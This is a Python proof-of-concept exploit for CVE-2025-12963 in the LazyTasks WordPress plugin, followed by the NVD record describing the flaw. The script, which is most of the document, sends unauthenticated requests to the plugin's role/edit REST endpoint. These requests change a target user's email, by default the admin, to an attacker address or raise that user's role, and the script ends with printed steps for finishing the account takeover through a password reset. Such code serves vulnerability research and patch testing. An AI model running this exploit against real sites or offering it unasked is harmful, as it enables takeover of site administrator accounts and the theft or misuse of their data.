CVE-2025-12963

# CVE-2025-12963 PoC - LazyTasks Plugin Account Takeover # Description: Unauthenticated privilege escalation via account takeover # Affected: LazyTasks WordPress plugin <= 1.2.29 import requests import sys import re class LazyTasksExploit: def __init__(self, target_url, target_email, attacker_email): self.target_url = target_url.rstrip('/') self.target_email = target_email self.attacker_email = attacker_email self.api_endpoint = '/wp-json/lazytasks/api/v1/user/role/edit/' def check_vulnerability(self): """Check if target is vulnerable""" print(f'[*] Checking if {self.target_url} is vulnerable...') # Try to access the vulnerable endpoint check_url = f'{self.target_url}{self.api_endpoint}' try: response = requests.get(check_url, timeout=10) if response.status_code in [200, 400, 405]: print('[+] Target appears to be running LazyTasks plugin') return True except requests.RequestException as e: print(f'[-] Error: {e}') return False return False def get_user_id(self, username): """Get WordPress user ID by username""" print(f'[*] Getting user ID for username: {username}') # Try WordPress REST API user endpoint user_url = f'{self.target_url}/wp-json/wp/v2/users?search={username}' try: response = requests.get(user_url, timeout=10) if response.status_code == 200 and response.json(): user_id = response.json()[0]['id'] print(f'[+] Found user ID: {user_id}') return user_id except: pass # Fallback: try to enumerate common admin usernames for admin_user in ['admin', 'administrator', username]: print(f' Trying username: {admin_user}') return 1 # Default to admin user ID def exploit_email_takeover(self, username): """Exploit the vulnerability to change target user's email""" print(f'[*] Exploiting email takeover vulnerability...') print(f'[*] Target email will be changed to: {self.attacker_email}') user_id = self.get_user_id(username) exploit_url = f'{self.target_url}{self.api_endpoint}' # Construct the exploit payload payload = { 'user_id': user_id, 'email': self.attacker_email, 'action': 'update_email' } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print(f'[*] Sending exploit request to {exploit_url}') response = requests.post( exploit_url, json=payload, headers=headers, timeout=10 ) if response.status_code in [200, 201]: print('[+] Email change request sent successfully!') print('[+] Check attacker email for password reset link') print(f'[*] Password reset will be sent to: {self.attacker_email}') return True else: print(f'[-] Exploit failed with status code: {response.status_code}') print(f'[-] Response: {response.text[:200]}') return False except requests.RequestException as e: print(f'[-] Error during exploit: {e}') return False def privilege_escalation(self, username, new_role): """Exploit to escalate user privileges""" print(f'[*] Attempting privilege escalation for user: {username}') user_id = self.get_user_id(username) exploit_url = f'{self.target_url}{self.api_endpoint}' payload = { 'user_id': user_id, 'role': new_role, 'action': 'update_role' } try: response = requests.post( exploit_url, json=payload, headers={'Content-Type': 'application/json'}, timeout=10 ) if response.status_code in [200, 201]: print(f'[+] Successfully escalated {username} to role: {new_role}') return True except: pass return False def main(): if len(sys.argv) < 4: print('Usage: python cve-2025-12963.py <target_url> <target_username> <attacker_email>') print('Example: python cve-2025-12963.py http://target.com admin [email protected]') sys.exit(1) target_url = sys.argv[1] target_username = sys.argv[2] attacker_email = sys.argv[3] exploit = LazyTasksExploit(target_url, '', attacker_email) if exploit.check_vulnerability(): print('[+] Target is potentially vulnerable!') print('\n[*] Step 1: Exploiting email takeover...') exploit.exploit_email_takeover(target_username) print('\n[!] After successful exploitation:') print(' 1. Check attacker email for password reset link') print(' 2. Click the reset link') print(' 3. Set new password to complete account takeover') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-12963", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:40.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LazyTasks – Project & Task Management with Collaboration, Kanban and Gantt Chart plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.29. This is due to the plugin not properly validating a user's identity via the 'wp-json/lazytasks/api/v1/user/role/edit/' REST API endpoint prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. It is also possible for attackers to abuse this endpoint to grant users with access to additional roles within the plugin"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/lazytasks-project-task-management/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6998185-0f9b-48ab-9dca-05adf5ae603a?source=cve", "source": "[email protected]"}]}}